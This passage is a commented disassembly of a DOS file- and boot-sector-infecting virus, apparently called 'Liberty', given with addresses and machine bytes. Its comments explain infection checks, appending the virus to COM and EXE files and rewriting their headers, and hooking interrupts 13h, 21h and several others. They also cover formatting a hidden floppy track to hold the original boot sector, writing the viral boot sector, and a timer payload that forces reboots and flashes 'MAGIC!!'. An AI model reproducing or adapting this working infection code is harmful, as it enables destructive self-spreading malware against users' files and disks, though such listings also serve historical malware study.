+CS:03BC 7505 JNZ 03C3
+CS:03BE E8C001 CALL 0581 ; Adapt header
+CS:03C1 EBB2 JMP 0375
+CS:03C3 2E CS:
+CS:03C4 C606090200 MOV BYTE PTR [0209],00 ; Set switch
+CS:03C9 E8CD00 CALL 0499 ; Check infection
+CS:03CC 74A7 JZ 0375
+CS:03CE E8DD00 CALL 04AE ; Encrypt header
+CS:03D1 E8EB00 CALL 04BF ; Move to EOF
+CS:03D4 729F JB 0375
+CS:03D6 83FA00 CMP DX,+00 ;
+CS:03D9 759A JNZ 0375 ;
+CS:03DB 3D0005 CMP AX,0500 ;
+CS:03DE 7295 JB 0375 ;
+CS:03E0 3DFFEF CMP AX,EFFF ;
+CS:03E3 7390 JNB 0375 ; Check file size
+CS:03E5 E8EA00 CALL 04D2 ; Move to next paragraph
+CS:03E8 728B JB 0375
+CS:03EA E80701 CALL 04F4 ; Write virus
+CS:03ED 7286 JB 0375
+CS:03EF 3BC1 CMP AX,CX
+CS:03F1 7C11 JL 0404
+CS:03F3 E81301 CALL 0509 ; Move to BOF
+CS:03F6 7209 JB 0401
+CS:03F8 E86201 CALL 055D ; Decrypt Libery header
+CS:03FB E81E01 CALL 051C ; Write Liberty header
+CS:03FE E86F01 CALL 0570 ; Encrypt Liberty Header
+CS:0401 E971FF JMP 0375
+CS:0404 E83801 CALL 053F ; Set & get vector 13h
+CS:0407 E96BFF JMP 0375
+;
+; Revectoring of error vectors.
+; +CS:0415 1E PUSH DS +CS:0416 33DB XOR BX,BX +CS:0418 8EDB MOV DS,BX +CS:041A FA CLI +CS:041B 2E CS: +CS:041C 8B1E0D04 MOV BX,[040D] +CS:0420 891E8C00 MOV [008C],BX +CS:0424 2E CS: +CS:0425 8B1E0F04 MOV BX,[040F] +CS:0429 891E8E00 MOV [008E],BX +CS:042D FA CLI +CS:042E 2E CS: +CS:042F 8B1E1104 MOV BX,[0411] +CS:0433 891E9000 MOV [0090],BX +CS:0437 2E CS: +CS:0438 8B1E1304 MOV BX,[0413] +CS:043C 891E8E00 MOV [008E],BX +CS:0440 1F POP DS +CS:0441 C3 RET +CS:0442 1E PUSH DS +CS:0443 33DB XOR BX,BX +CS:0445 8EDB MOV DS,BX +CS:0447 8B1E8C00 MOV BX,[008C] +CS:044B 2E CS: +CS:044C 891E0D04 MOV [040D],BX +CS:0450 8B1E8E00 MOV BX,[008E] +CS:0454 2E CS: +CS:0455 891E0F04 MOV [040F],BX +CS:0459 FA CLI +CS:045A BB3106 MOV BX,0631 +CS:045D 891E8C00 MOV [008C],BX +CS:0461 8C0E8E00 MOV [008E],CS +CS:0465 8B1E9000 MOV BX,[0090] +CS:0469 2E CS: +CS:046A 891E1104 MOV [0411],BX +CS:046E 8B1E9200 MOV BX,[0092] +CS:0472 FA CLI +CS:0473 BB3206 MOV BX,0632 +CS:0476 891E9000 MOV [0090],BX +CS:047A 8C0E9200 MOV [0092],CS +CS:047E 1F POP DS +CS:047F C3 RET +; +; Various subroutines used by the virus +; +CS:0480 B8023D MOV AX,3D02 +CS:0483 9C PUSHF +CS:0484 2E CS: +CS:0485 FF1E8C03 CALL FAR [038C] +CS:0489 C3 RET +CS:048A B43F MOV AH,3F +CS:048C B97800 MOV CX,0078 +CS:048F BA1301 MOV DX,0113 +CS:0492 9C PUSHF +CS:0493 2E CS: +CS:0494 FF1E8C03 CALL FAR [038C] +CS:0498 C3 RET +CS:0499 BF1301 MOV DI,0113 +CS:049C 81C76802 ADD DI,0268 +CS:04A0 81EF0A02 SUB DI,020A +CS:04A4 BE6802 MOV SI,0268 +CS:04A7 FC CLD +CS:04A8 B90700 MOV CX,0007 +CS:04AB F3 REPZ +CS:04AC A6 CMPSB +CS:04AD C3 RET +CS:04AE B93C00 MOV CX,003C +CS:04B1 BE1301 MOV SI,0113 +CS:04B4 8B14 MOV DX,[SI] +CS:04B6 D3C2 ROL DX,CL +CS:04B8 8914 MOV [SI],DX +CS:04BA 46 INC SI +CS:04BB 46 INC SI +CS:04BC E2F6 LOOP 04B4 +CS:04BE C3 RET +CS:04BF B80242 MOV AX,4202 +CS:04C2 2E CS: +CS:04C3 8B1E0A04 MOV BX,[040A] +CS:04C7 33C9 XOR CX,CX +CS:04C9 33D2 XOR DX,DX +CS:04CB 9C PUSHF +CS:04CC 2E CS: +CS:04CD FF1E8C03 CALL FAR [038C] +CS:04D1 C3 
RET +CS:04D2 B90400 MOV CX,0004 +CS:04D5 D3E8 SHR AX,CL +CS:04D7 BB6602 MOV BX,0266 +CS:04DA 8907 MOV [BX],AX +CS:04DC 40 INC AX +CS:04DD B90400 MOV CX,0004 +CS:04E0 D3E0 SHL AX,CL +CS:04E2 92 XCHG DX,AX +CS:04E3 33C9 XOR CX,CX +CS:04E5 B80042 MOV AX,4200 +CS:04E8 2E CS: +CS:04E9 8B1E0A04 MOV BX,[040A] +CS:04ED 9C PUSHF +CS:04EE 2E CS: +CS:04EF FF1E8C03 CALL FAR [038C] +CS:04F3 C3 RET +CS:04F4 B9330B MOV CX,0B33 +CS:04F7 B80040 MOV AX,4000 +CS:04FA BA1001 MOV DX,0110 +CS:04FD 2E CS: +CS:04FE 8B1E0A04 MOV BX,[040A] +CS:0502 9C PUSHF +CS:0503 2E CS: +CS:0504 FF1E8C03 CALL FAR [038C] +CS:0508 C3 RET +CS:0509 B80042 MOV AX,4200 +CS:050C 2E CS: +CS:050D 8B1E0A04 MOV BX,[040A] +CS:0511 33C9 XOR CX,CX +CS:0513 33D2 XOR DX,DX +CS:0515 9C PUSHF +CS:0516 2E CS: +CS:0517 FF1E8C03 CALL FAR [038C] +CS:051B C3 RET +CS:051C BA0A02 MOV DX,020A +CS:051F B80040 MOV AX,4000 +CS:0522 2E CS: +CS:0523 8B1E0A04 MOV BX,[040A] +CS:0527 B97800 MOV CX,0078 +CS:052A 9C PUSHF +CS:052B 2E CS: +CS:052C FF1E8C03 CALL FAR [038C] +CS:0530 C3 RET +CS:0531 B43E MOV AH,3E +CS:0533 2E CS: +CS:0534 8B1E0A04 MOV BX,[040A] +CS:0538 9C PUSHF +CS:0539 2E CS: +CS:053A FF1E8C03 CALL FAR [038C] +CS:053E C3 RET +CS:053F 33C0 XOR AX,AX +CS:0541 8ED8 MOV DS,AX +CS:0543 FA CLI +CS:0544 A14C00 MOV AX,[004C] +CS:0547 2E CS: +CS:0548 A31407 MOV [0714],AX +CS:054B A14E00 MOV AX,[004E] +CS:054E 2E CS: +CS:054F A31607 MOV [0716],AX +CS:0552 B8F906 MOV AX,06F9 +CS:0555 A34C00 MOV [004C],AX +CS:0558 8C0E4E00 MOV [004E],CS +CS:055C C3 RET +; +; Header encrypting +; +CS:055D B92D00 MOV CX,002D +CS:0560 BE0A02 MOV SI,020A +CS:0563 2E CS: +CS:0564 8B3C MOV DI,[SI] +CS:0566 D3CF ROR DI,CL +CS:0568 2E CS: +CS:0569 893C MOV [SI],DI +CS:056B 46 INC SI +CS:056C 46 INC SI +CS:056D E2F4 LOOP 0563 +CS:056F C3 RET +CS:0570 BE0A02 MOV SI,020A +CS:0573 B92D00 MOV CX,002D +CS:0576 8B3C MOV DI,[SI] +CS:0578 D3C7 ROL DI,CL +CS:057A 893C MOV [SI],DI +CS:057C 46 INC SI +CS:057D 46 INC SI +CS:057E E2F6 LOOP 0576 +CS:0580 C3 RET +; +; .EXE 
file handling +; +CS:0581 8B7F02 MOV DI,[BX+02] +CS:0584 83FFFF CMP DI,-01 ; Check infection +CS:0587 7439 JZ 05C2 +CS:0589 8B7F16 MOV DI,[BX+16] +CS:058C 83C710 ADD DI,+10 +CS:058F 893E2806 MOV [0628],DI +CS:0593 8B7F14 MOV DI,[BX+14] +CS:0596 893E2A06 MOV [062A],DI +CS:059A 8B7F0E MOV DI,[BX+0E] +CS:059D 83C710 ADD DI,+10 +CS:05A0 893E2C06 MOV [062C],DI +CS:05A4 8B7F10 MOV DI,[BX+10] +CS:05A7 893E2E06 MOV [062E],DI +CS:05AB BF1001 MOV DI,0110 +CS:05AE 897F14 MOV [BX+14],DI ; Set IP +CS:05B1 BF420D MOV DI,0D42 +CS:05B4 897F10 MOV [BX+10],DI ; Set SP +CS:05B7 2E CS: +CS:05B8 C606090201 MOV BYTE PTR [0209],01 ; Set switch +CS:05BD E8FFFE CALL 04BF ; Move to EOF +CS:05C0 7301 JNB 05C3 +CS:05C2 C3 RET +CS:05C3 83FA0A CMP DX,+0A ; +CS:05C6 77FA JA 05C2 ; Check file size +CS:05C8 B104 MOV CL,04 +CS:05CA D3E8 SHR AX,CL +CS:05CC 40 INC AX +CS:05CD 3D0010 CMP AX,1000 +CS:05D0 7501 JNZ 05D3 +CS:05D2 42 INC DX +CS:05D3 D3E0 SHL AX,CL +CS:05D5 50 PUSH AX +CS:05D6 52 PUSH DX +CS:05D7 B91000 MOV CX,0010 +CS:05DA F7F1 DIV CX +CS:05DC BB1301 MOV BX,0113 +CS:05DF 2D1100 SUB AX,0011 +CS:05E2 8B7F08 MOV DI,[BX+08] +CS:05E5 2BC7 SUB AX,DI +CS:05E7 894716 MOV [BX+16],AX ; Set CodeSegment +CS:05EA 89470E MOV [BX+0E],AX ; Set StackSegment +CS:05ED 59 POP CX +CS:05EE 5A POP DX +CS:05EF E8F3FE CALL 04E5 ; Move to next paragraph +CS:05F2 722F JB 0623 +CS:05F4 E8FDFE CALL 04F4 ; Write virus +CS:05F7 722A JB 0623 +CS:05F9 3BC1 CMP AX,CX +CS:05FB 7C27 JL 0624 +CS:05FD E8BFFE CALL 04BF ; Move to BOF +CS:0600 7221 JB 0623 +CS:0602 B90002 MOV CX,0200 +CS:0605 F7F1 DIV CX +CS:0607 83FA00 CMP DX,+00 +CS:060A 7401 JZ 060D +CS:060C 40 INC AX +CS:060D BB1301 MOV BX,0113 +CS:0610 894704 MOV [BX+04],AX ; Set blocks +CS:0613 C74702FFFF MOV WORD PTR [BX+02],FFFF ; Set infection mark +CS:0618 E8EEFE CALL 0509 ; Move to BOF +CS:061B 7206 JB 0623 +CS:061D BA1301 MOV DX,0113 +CS:0620 E8FCFE CALL 051F ; Write header +CS:0623 C3 RET +CS:0624 E818FF CALL 053F ; Set & get vector 13h +CS:0627 C3 RET +; +; Error 
vectors +; +CS:0631 CF IRET ; Error vector 23h +CS:0632 32C0 XOR AL,AL ; +CS:0634 CF IRET ; Error vector 24h +; +; The next part is the virus's bootsector +; +CS:0635 EB01 JMP 0638 +CS:0637 90 NOP +CS:0638 33C0 XOR AX,AX +CS:063A 8ED0 MOV SS,AX +CS:063C BC007C MOV SP,7C00 +CS:063F 33C0 XOR AX,AX +CS:0641 8EC0 MOV ES,AX +CS:0643 BB1304 MOV BX,0413 ; +CS:0646 26 ES: ; +CS:0647 8B07 MOV AX,[BX] ; +CS:0649 2D0A00 SUB AX,000A ; +CS:064C B106 MOV CL,06 ; +CS:064E 26 ES: ; +CS:064F 8907 MOV [BX],AX ; Decrease memory +CS:0651 D3E0 SHL AX,CL +CS:0653 8EC0 MOV ES,AX +CS:0655 B80802 MOV AX,0208 ; +CS:0658 BB1001 MOV BX,0110 ; +CS:065B B93128 MOV CX,2831 ; +CS:065E 33D2 XOR DX,DX ; +CS:0660 CD13 INT 13 ; Read virus +CS:0662 06 PUSH ES +CS:0663 BB6806 MOV BX,0668 +CS:0666 53 PUSH BX +CS:0667 CB RETF +CS:0668 2E CS: +CS:0669 803EC8060A CMP BYTE PTR [06C8],0A +CS:066E 7446 JZ 06B6 +CS:0670 33C0 XOR AX,AX +CS:0672 8ED8 MOV DS,AX +CS:0674 2E CS: +CS:0675 FE06C806 INC BYTE PTR [06C8] +CS:0679 B80803 MOV AX,0308 +CS:067C BB1001 MOV BX,0110 +CS:067F B93128 MOV CX,2831 +CS:0682 33D2 XOR DX,DX +CS:0684 CD13 INT 13 +CS:0686 E85200 CALL 06DB ; Set & get vector 13h +CS:0689 2E CS: ; +CS:068A C606470BFF MOV BYTE PTR [0B47],FF ; +CS:068F 90 NOP ; +CS:0690 2E CS: ; +CS:0691 C606950BFF MOV BYTE PTR [0B95],FF ; +CS:0696 90 NOP ; +CS:0697 2E CS: ; +CS:0698 C606080CFF MOV BYTE PTR [0C08],FF ; Switches off +CS:069D 90 NOP +CS:069E E82902 CALL 08CA ; Set & get vector 8h +CS:06A1 E85402 CALL 08F8 ; Set & get vector 1Ch +CS:06A4 E84104 CALL 0AE8 ; Set & get vector 10h +CS:06A7 E85804 CALL 0B02 ; Set & get vector 14h +CS:06AA E86F04 CALL 0B1C ; Set & get vector 17h +CS:06AD E81900 CALL 06C9 ; Read original bootsector +CS:06B0 BB007C MOV BX,7C00 ; +CS:06B3 1E PUSH DS ; +CS:06B4 53 PUSH BX ; +CS:06B5 CB RETF ; Start +CS:06B6 E81000 CALL 06C9 ; Read bootsector +CS:06B9 B80103 MOV AX,0301 +CS:06BC BB007C MOV BX,7C00 +CS:06BF B90100 MOV CX,0001 +CS:06C2 33D2 XOR DX,DX +CS:06C4 CD13 INT 13 +CS:06C6 EBE5 JMP 
06AD +CS:06C9 33C0 XOR AX,AX +CS:06CB 8EC0 MOV ES,AX +CS:06CD B80102 MOV AX,0201 +CS:06D0 BB007C MOV BX,7C00 +CS:06D3 B93F28 MOV CX,283F +CS:06D6 33D2 XOR DX,DX +CS:06D8 CD13 INT 13 +CS:06DA C3 RET +CS:06DB 33C0 XOR AX,AX +CS:06DD 8ED8 MOV DS,AX +CS:06DF A14C00 MOV AX,[004C] +CS:06E2 2E CS: +CS:06E3 A31608 MOV [0816],AX +CS:06E6 A14E00 MOV AX,[004E] +CS:06E9 2E CS: +CS:06EA A31808 MOV [0818],AX +CS:06ED FA CLI +CS:06EE B8FB07 MOV AX,07FB +CS:06F1 A34C00 MOV [004C],AX +CS:06F4 8C0E4E00 MOV [004E],CS +CS:06F8 C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:06F9 9C PUSHF +CS:06FA 80FC01 CMP AH,01 +CS:06FD 7E13 JLE 0712 +CS:06FF 80FC04 CMP AH,04 +CS:0702 7D0E JGE 0712 +CS:0704 80FA80 CMP DL,80 +CS:0707 720F JB 0718 +CS:0709 E8BE00 CALL 07CA ; Disconnect vector 13h +CS:070C 07 POP ES +CS:070D 1F POP DS +CS:070E 5A POP DX +CS:070F 59 POP CX +CS:0710 5B POP BX +CS:0711 58 POP AX +CS:0712 9D POPF +CS:0713 EA00000000 JMP 0000:0000 +CS:0718 50 PUSH AX +CS:0719 53 PUSH BX +CS:071A 51 PUSH CX +CS:071B 52 PUSH DX +CS:071C 1E PUSH DS +CS:071D 06 PUSH ES +CS:071E B80102 MOV AX,0201 ; +CS:0721 0E PUSH CS ; +CS:0722 07 POP ES ; +CS:0723 0E PUSH CS ; +CS:0724 1F POP DS ; +CS:0725 BB420C MOV BX,0C42 ; +CS:0728 B90100 MOV CX,0001 ; +CS:072B 32F6 XOR DH,DH ; +CS:072D 9C PUSHF ; +CS:072E 2E CS: ; +CS:072F FF1E1407 CALL FAR [0714] ; Read Bootsector +CS:0733 72D4 JB 0709 +CS:0735 0E PUSH CS +CS:0736 1F POP DS +CS:0737 0E PUSH CS +CS:0738 07 POP ES +CS:0739 BE420C MOV SI,0C42 ; +CS:073C BF3506 MOV DI,0635 ; +CS:073F B90A00 MOV CX,000A ; +CS:0742 FC CLD ; +CS:0743 F3 REPZ ; +CS:0744 A7 CMPSW ; Check infection +CS:0745 74C2 JZ 0709 +CS:0747 BE420C MOV SI,0C42 +CS:074A 807C02FF CMP BYTE PTR [SI+02],FF ; Was infected ? 
+CS:074E 744A JZ 079A
+CS:0750 B0FF MOV AL,FF
+CS:0752 884402 MOV [SI+02],AL
+CS:0755 B80905 MOV AX,0509 ;
+CS:0758 BBA607 MOV BX,07A6 ;
+CS:075B B93128 MOV CX,2831 ;
+CS:075E 9C PUSHF ;
+CS:075F 2E CS: ;
+CS:0760 FF1E1407 CALL FAR [0714] ; Format track 40
+CS:0764 72A3 JB 0709
+CS:0766 B80103 MOV AX,0301 ;
+CS:0769 BB420C MOV BX,0C42 ;
+CS:076C B93F28 MOV CX,283F ;
+CS:076F 9C PUSHF ;
+CS:0770 2E CS: ;
+CS:0771 FF1E1407 CALL FAR [0714] ; Write original bootsector
+CS:0775 7292 JB 0709
+CS:0777 B80103 MOV AX,0301 ;
+CS:077A BB3506 MOV BX,0635 ;
+CS:077D B90100 MOV CX,0001 ;
+CS:0780 9C PUSHF ;
+CS:0781 2E CS: ;
+CS:0782 FF1E1407 CALL FAR [0714] ; Write Libery bootsector
+CS:0786 7281 JB 0709
+CS:0788 B80803 MOV AX,0308 ;
+CS:078B BB1001 MOV BX,0110 ;
+CS:078E B93128 MOV CX,2831 ;
+CS:0791 9C PUSHF ;
+CS:0792 2E CS: ;
+CS:0793 FF1E1407 CALL FAR [0714] ; Write Liberty virus
+CS:0797 E96FFF JMP 0709
+CS:079A 2E CS: ;
+CS:079B C606100300 MOV BYTE PTR [0310],00 ;
+CS:07A0 E83B00 CALL 07DE ; Attach ???
+CS:07A3 E963FF JMP 0709 +; +; The format table is next +; +DS:07A0 28 00-31 02 28 00 32 02 28 00 +DS:07B0 33 02 28 00 34 02 28 00-35 02 28 00 36 02 28 00 +DS:07C0 37 02 28 00 38 02 28 00-3F 02 +; +; Revectoring +; +CS:07CA 33C0 XOR AX,AX +CS:07CC 8ED8 MOV DS,AX +CS:07CE FA CLI +CS:07CF 2E CS: +CS:07D0 A11407 MOV AX,[0714] +CS:07D3 A34C00 MOV [004C],AX +CS:07D6 2E CS: +CS:07D7 A11607 MOV AX,[0716] +CS:07DA A34E00 MOV [004E],AX +CS:07DD C3 RET +CS:07DE 2E CS: +CS:07DF A11407 MOV AX,[0714] +CS:07E2 2E CS: +CS:07E3 A30C03 MOV [030C],AX +CS:07E6 2E CS: +CS:07E7 A11607 MOV AX,[0716] +CS:07EA 2E CS: +CS:07EB A30E03 MOV [030E],AX +CS:07EE B8F702 MOV AX,02F7 +CS:07F1 2E CS: +CS:07F2 A31407 MOV [0714],AX +CS:07F5 2E CS: +CS:07F6 8C0E1607 MOV [0716],CS +CS:07FA C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:07FB 9C PUSHF +CS:07FC 80FC03 CMP AH,03 +CS:07FF 7213 JB 0814 +CS:0801 80FC05 CMP AH,05 +CS:0804 730E JNB 0814 +CS:0806 80FA80 CMP DL,80 +CS:0809 720F JB 081A +CS:080B EB07 JMP 0814 +CS:080D 90 NOP +CS:080E 07 POP ES +CS:080F 1F POP DS +CS:0810 5A POP DX +CS:0811 59 POP CX +CS:0812 5B POP BX +CS:0813 58 POP AX +CS:0814 9D POPF +CS:0815 EA00000000 JMP 0000:0000 +CS:081A 50 PUSH AX +CS:081B 53 PUSH BX +CS:081C 51 PUSH CX +CS:081D 52 PUSH DX +CS:081E 1E PUSH DS +CS:081F 06 PUSH ES +CS:0820 2E CS: +CS:0821 803E0C0401 CMP BYTE PTR [040C],01 +CS:0826 74E6 JZ 080E +CS:0828 B80102 MOV AX,0201 ; +CS:082B 0E PUSH CS ; +CS:082C 07 POP ES ; +CS:082D 0E PUSH CS ; +CS:082E 1F POP DS ; +CS:082F BB420C MOV BX,0C42 ; +CS:0832 B90100 MOV CX,0001 ; +CS:0835 32F6 XOR DH,DH ; +CS:0837 9C PUSHF ; +CS:0838 2E CS: ; +CS:0839 FF1E1608 CALL FAR [0816] ; Read bootsector +CS:083D 72CF JB 080E +CS:083F 0E PUSH CS +CS:0840 1F POP DS +CS:0841 0E PUSH CS +CS:0842 07 POP ES +CS:0843 BE420C MOV SI,0C42 ; +CS:0846 BF3506 MOV DI,0635 ; +CS:0849 B90A00 MOV CX,000A ; +CS:084C FC CLD ; +CS:084D F3 REPZ ; +CS:084E A7 CMPSW ; Check infection +CS:084F 74BD JZ 080E +CS:0851 B0FF MOV AL,FF +CS:0853 
884702 MOV [BX+02],AL +CS:0856 B80905 MOV AX,0509 ; +CS:0859 BBA607 MOV BX,07A6 ; +CS:085C B93128 MOV CX,2831 ; +CS:085F 9C PUSHF ; +CS:0860 2E CS: ; +CS:0861 FF1E1608 CALL FAR [0816] ; Format track 28 +CS:0865 72A7 JB 080E +CS:0867 B80103 MOV AX,0301 ; +CS:086A BB420C MOV BX,0C42 ; +CS:086D B93F28 MOV CX,283F ; +CS:0870 9C PUSHF ; +CS:0871 2E CS: ; +CS:0872 FF1E1608 CALL FAR [0816] ; Write original bootsector +CS:0876 7296 JB 080E +CS:0878 B80103 MOV AX,0301 ; +CS:087B BB3506 MOV BX,0635 ; +CS:087E B90100 MOV CX,0001 ; +CS:0881 9C PUSHF ; +CS:0882 2E CS: ; +CS:0883 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0887 7285 JB 080E +CS:0889 B80803 MOV AX,0308 ; +CS:088C BB1001 MOV BX,0110 ; +CS:088F B93128 MOV CX,2831 ; +CS:0892 9C PUSHF ; +CS:0893 2E CS: ; +CS:0894 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0898 E973FF JMP 080E +CS:089B 9C PUSHF +CS:089C 50 PUSH AX +CS:089D 1E PUSH DS +CS:089E 33C0 XOR AX,AX +CS:08A0 8ED8 MOV DS,AX +CS:08A2 833E860000 CMP WORD PTR [0086],+00 ; +CS:08A7 750F JNZ 08B8 ; Check if DOS is installed +CS:08A9 833E840000 CMP WORD PTR [0084],+00 ; +CS:08AE 7508 JNZ 08B8 +CS:08B0 1F POP DS +CS:08B1 58 POP AX +CS:08B2 9D POPF +CS:08B3 EA00000000 JMP 0000:0000 +CS:08B8 06 PUSH ES +CS:08B9 0E PUSH CS +CS:08BA 07 POP ES +CS:08BB E8C3F9 CALL 0281 ; Get vector 21h +CS:08BE E8F1F9 CALL 02B2 ; Set vector 21h +CS:08C1 E82000 CALL 08E4 ; Disconnect vector 8h +CS:08C4 E8FBF9 CALL 02C2 ; Set installation flag +CS:08C7 07 POP ES +CS:08C8 EBE6 JMP 08B0 +; +; Revectoring +; +CS:08CA A12000 MOV AX,[0020] +CS:08CD 2E CS: +CS:08CE A3B408 MOV [08B4],AX +CS:08D1 A12200 MOV AX,[0022] +CS:08D4 2E CS: +CS:08D5 A3B608 MOV [08B6],AX +CS:08D8 B89B08 MOV AX,089B +CS:08DB FA CLI +CS:08DC A32000 MOV [0020],AX +CS:08DF 8C0E2200 MOV [0022],CS +CS:08E3 C3 RET +CS:08E4 33C0 XOR AX,AX +CS:08E6 8ED8 MOV DS,AX +CS:08E8 FA CLI +CS:08E9 2E CS: +CS:08EA A1B408 MOV AX,[08B4] +CS:08ED A32000 MOV [0020],AX +CS:08F0 2E CS: +CS:08F1 A1B608 MOV AX,[08B6] +CS:08F4 
A32200 MOV [0022],AX +CS:08F7 C3 RET +CS:08F8 A17000 MOV AX,[0070] +CS:08FB 2E CS: +CS:08FC A3900A MOV [0A90],AX +CS:08FF A17200 MOV AX,[0072] +CS:0902 2E CS: +CS:0903 A3920A MOV [0A92],AX +CS:0906 B8580A MOV AX,0A58 +CS:0909 FA CLI +CS:090A A37000 MOV [0070],AX +CS:090D 8C0E7200 MOV [0072],CS +CS:0911 C3 RET +; +; The next routine displays 'M A G I C ! !' on the screen for a second +; +CS:0912 50 PUSH AX +CS:0913 53 PUSH BX +CS:0914 51 PUSH CX +CS:0915 52 PUSH DX +CS:0916 56 PUSH SI +CS:0917 57 PUSH DI +CS:0918 1E PUSH DS +CS:0919 06 PUSH ES +CS:091A 9C PUSHF +CS:091B BB00B8 MOV BX,B800 ; +CS:091E 8EDB MOV DS,BX ; +CS:0920 0E PUSH CS ; +CS:0921 07 POP ES ; +CS:0922 33F6 XOR SI,SI ; +CS:0924 BF6809 MOV DI,0968 ; +CS:0927 B9A000 MOV CX,00A0 ; +CS:092A F3 REPZ ; +CS:092B A4 MOVSB ; Save screen +CS:092C BB00B8 MOV BX,B800 ; +CS:092F 8EC3 MOV ES,BX ; +CS:0931 0E PUSH CS ; +CS:0932 1F POP DS ; +CS:0933 33FF XOR DI,DI ; +CS:0935 BB080A MOV BX,0A08 ; +CS:0938 B95000 MOV CX,0050 ; +CS:093B B6CE MOV DH,CE ; +CS:093D 8A17 MOV DL,[BX] ; +CS:093F 80EA03 SUB DL,03 ; +CS:0942 26 ES: ; +CS:0943 8915 MOV [DI],DX ; +CS:0945 47 INC DI ; +CS:0946 47 INC DI ; +CS:0947 43 INC BX ; +CS:0948 E2F3 LOOP 093D ; Put text on screen +CS:094A E2FE LOOP 094A ; Wait +CS:094C BB00B8 MOV BX,B800 ; +CS:094F 8EC3 MOV ES,BX ; +CS:0951 0E PUSH CS ; +CS:0952 1F POP DS ; +CS:0953 33FF XOR DI,DI ; +CS:0955 BE6809 MOV SI,0968 ; +CS:0958 B9A000 MOV CX,00A0 ; +CS:095B F3 REPZ ; +CS:095C A4 MOVSB ; Restore screen +CS:095D 9D POPF +CS:095E 07 POP ES +CS:095F 1F POP DS +CS:0960 5F POP DI +CS:0961 5E POP SI +CS:0962 5A POP DX +CS:0963 59 POP CX +CS:0964 5B POP BX +CS:0965 58 POP AX +CS:0966 C3 RET +; +; A temporary screen buffer +; +DS:0960 4D 41 47 49 43 4D 41 47 +DS:0970 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:0980 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:0990 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09A0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:09B0 47 49 43 4D 41 
47 49 43-4D 41 47 49 43 4D 41 47 +DS:09C0 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:09D0 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:09E0 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09F0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:0A00 47 49 43 4D 41 47 49 43 +; +; The encrypted text 'M A G I C ! !' +; +DS:0A00 23 23 23 23 23 23 23 23 +DS:0A10 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A20 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A30 23 23 23 23 23 23 23 23-23 23 50 23 44 23 4A 23 +DS:0A40 4C 23 46 23 23 24 23 24-23 24 23 23 23 23 23 23 +DS:0A50 23 23 23 23 23 23 23 23 +; +; The next routine is the timer routine. It activates all the gadgets. +; +CS:0A58 9C PUSHF +CS:0A59 50 PUSH AX +CS:0A5A 1E PUSH DS +CS:0A5B 2E CS: +CS:0A5C FF06940A INC WORD PTR [0A94] +CS:0A60 2E CS: +CS:0A61 833E960A0B CMP WORD PTR [0A96],+0B ; Time for a reboot ? +CS:0A66 7433 JZ 0A9B +CS:0A68 2E CS: +CS:0A69 A1980A MOV AX,[0A98] +CS:0A6C 2E CS: +CS:0A6D 3906940A CMP [0A94],AX ; Time for gadgets on ? +CS:0A71 7430 JZ 0AA3 +CS:0A73 7217 JB 0A8C +CS:0A75 050002 ADD AX,0200 +CS:0A78 2E CS: +CS:0A79 3906940A CMP [0A94],AX ; Time for gadgets off ? +CS:0A7D 7446 JZ 0AC5 +CS:0A7F 770B JA 0A8C +CS:0A81 2E CS: +CS:0A82 833E960A0A CMP WORD PTR [0A96],+0A ; Time for screen messing ? 
+CS:0A87 7503 JNZ 0A8C +CS:0A89 E886FE CALL 0912 ; Mess up screen +CS:0A8C 1F POP DS +CS:0A8D 58 POP AX +CS:0A8E 9D POPF +CS:0A8F EA00000000 JMP 0000:0000 ; Continue +CS:0A9B B8FFFF MOV AX,FFFF +CS:0A9E 50 PUSH AX +CS:0A9F 33C0 XOR AX,AX +CS:0AA1 50 PUSH AX +CS:0AA2 CB RETF +CS:0AA3 2E CS: +CS:0AA4 812E980A5001 SUB WORD PTR [0A98],0150 +CS:0AAA 33C0 XOR AX,AX +CS:0AAC 8ED8 MOV DS,AX +CS:0AAE 2E CS: +CS:0AAF C606470B00 MOV BYTE PTR [0B47],00 +CS:0AB4 90 NOP +CS:0AB5 2E CS: +CS:0AB6 C606950B00 MOV BYTE PTR [0B95],00 +CS:0ABB 90 NOP +CS:0ABC 2E CS: +CS:0ABD C606080C00 MOV BYTE PTR [0C08],00 +CS:0AC2 90 NOP +CS:0AC3 EBC7 JMP 0A8C +CS:0AC5 2E CS: +CS:0AC6 C606470BFF MOV BYTE PTR [0B47],FF +CS:0ACB 90 NOP +CS:0ACC 2E CS: +CS:0ACD C606950BFF MOV BYTE PTR [0B95],FF +CS:0AD2 90 NOP +CS:0AD3 2E CS: +CS:0AD4 C606080CFF MOV BYTE PTR [0C08],FF +CS:0AD9 90 NOP +CS:0ADA 2E CS: +CS:0ADB C706940A0000 MOV WORD PTR [0A94],0000 +CS:0AE1 2E CS: +CS:0AE2 FF06960A INC WORD PTR [0A96] +CS:0AE6 EBA4 JMP 0A8C +CS:0AE8 A14000 MOV AX,[0040] +CS:0AEB 2E CS: +CS:0AEC A3430B MOV [0B43],AX +CS:0AEF A14200 MOV AX,[0042] +CS:0AF2 2E CS: +CS:0AF3 A3450B MOV [0B45],AX +CS:0AF6 B8360B MOV AX,0B36 +CS:0AF9 FA CLI +CS:0AFA A34000 MOV [0040],AX +CS:0AFD 8C0E4200 MOV [0042],CS +CS:0B01 C3 RET +CS:0B02 FA CLI +CS:0B03 A15000 MOV AX,[0050] +CS:0B06 2E CS: +CS:0B07 A3910B MOV [0B91],AX +CS:0B0A A15200 MOV AX,[0052] +CS:0B0D 2E CS: +CS:0B0E A3930B MOV [0B93],AX +CS:0B11 B8840B MOV AX,0B84 +CS:0B14 A35000 MOV [0050],AX +CS:0B17 